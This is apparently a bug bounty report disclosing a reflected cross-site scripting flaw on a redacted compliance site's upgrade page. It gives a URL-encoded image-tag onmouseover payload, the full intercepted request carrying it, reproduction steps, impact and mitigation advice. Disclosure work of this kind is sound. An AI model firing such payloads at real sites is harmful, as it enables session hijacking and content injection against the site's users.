Reflected Cross Site Scripting

Reported to Private
Reported by Haqtify
Medium (4.2)
$200
Published 3 years ago
No Likes

URL:

http://compliance.redacted.com/app/upgrade

Description:

Cross–Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

%f6<img%20src%3dx%20onmouseover%3d”alert(1)”%20//%f6>

Steps To Reproduce:

1. Goto this URL.

http://compliance.redacted .com/app/upgrade//

2.Intercept the request and insert XSS Payload after URL.

REQUEST :

GET /app/upgrade//yy%f6<img%20src%3dx%20onmouseover%3d”alert(1)”%20//%f6> HTTP/1.1
Host: compliance.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

3. XSS Executed.

POC:

xss

Impact:

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Mitigation:

Developers should implement robust input validation and output encoding consistently across the application to defend against XSS and other input validation attacks. All of this input \ output mechanism recommended to implement: encoding \ escaping \ ‘black list’ \ filtering all special characters, e.g.: <, >, ‘, “, etc